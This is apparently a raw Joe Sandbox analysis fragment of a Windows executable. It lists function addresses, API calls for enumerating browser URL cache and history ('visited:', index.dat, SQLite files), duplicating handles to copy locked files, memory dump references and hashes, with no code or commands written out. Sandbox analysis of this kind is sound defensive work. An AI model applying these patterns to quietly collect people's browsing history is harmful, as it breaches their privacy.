                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                                                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                                                                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                                                                                                                                              • String ID: visited:

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

[Figure: control-flow graph starting at block 40e175; nodes are marked as executed or not executed]
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                                                                                                              • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                                                                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

[Figure: control-flow graph starting at block 41837f; nodes are marked as executed or not executed]
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                                                                                                                              • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                                                                                                                              • String ID: |A
                                                                                                                                                                                                                                                                                                                              • API String ID: 77810686-1717621600
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96


                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                                                                                                              • String ID: r!A
                                                                                                                                                                                                                                                                                                                              • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                                                                                                                              • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                                                                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                                                                                                                              • String ID: $0.@
                                                                                                                                                                                                                                                                                                                              • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                                                                                                              • String ID: "%s"
                                                                                                                                                                                                                                                                                                                              • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                                                                                                              • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memcmp
                                                                                                                                                                                                                                                                                                                              • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                                                                                                              • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                                                                                                                              • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _wcsicmpqsort
                                                                                                                                                                                                                                                                                                                              • String ID: /nosort$/sort
                                                                                                                                                                                                                                                                                                                              • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ??2@
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1979745280-0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                                                              • String ID: *.*$index.dat
                                                                                                                                                                                                                                                                                                                              • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1156039329-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3397143404-0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
